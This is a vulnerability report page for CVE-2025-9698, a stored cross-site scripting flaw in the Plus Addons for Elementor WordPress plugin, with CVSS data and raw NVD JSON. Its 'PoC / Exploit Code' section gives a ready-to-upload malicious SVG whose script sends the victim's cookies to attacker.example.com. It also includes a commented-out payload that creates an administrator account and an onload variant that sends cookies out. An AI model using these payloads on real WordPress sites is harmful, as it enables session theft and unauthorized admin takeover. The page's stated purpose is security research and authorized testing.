Security Vulnerability Report
中文
CVE-2025-9698 CVSS 6.8 MEDIUM

CVE-2025-9698

Published: 2025-10-13 06:15:43
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Plus Addons for Elementor WordPress plugin before 6.3.16 does not sanitize SVG file contents, which could allow users with minimum role access as Author to perform Stored Cross-Site Scripting attacks.

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

The Plus Addons for Elementor < 6.3.16

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Malicious SVG file for Stored XSS via The Plus Addons for Elementor --> <!-- Save as evil.svg and upload via the plugin's file upload feature --> <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <script type="text/javascript"> // Payload: Steal cookies and send to attacker server var cookie = document.cookie; var img = new Image(); img.src = "https://attacker.example.com/steal?c=" + encodeURIComponent(cookie); // Alternative: Create admin user via AJAX /* var xhr = new XMLHttpRequest(); xhr.open("POST", "/wp-admin/user-new.php", true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.send("action=createuser&_wpnonce=xxx&user_login=hacker&[email protected]&pass1=password123&pass2=password123&role=administrator"); */ </script> <rect width="100" height="100" style="fill:red"/> </svg> <!-- Alternative payload using onload event --> <!-- <svg xmlns="http://www.w3.org/2000/svg" onload="alert('XSS'); document.location='https://attacker.com/?cookie='+document.cookie"> <circle cx="50" cy="50" r="40" fill="green"/> </svg> -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9698", "sourceIdentifier": "[email protected]", "published": "2025-10-13T06:15:42.677", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Plus Addons for Elementor WordPress plugin before 6.3.16 does not sanitize SVG file contents, which could allow users with minimum role access as Author to perform Stored Cross-Site Scripting attacks."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "references": [{"url": "https://wpscan.com/vulnerability/a9539def-d92b-4117-b36a-17015c578d89/", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.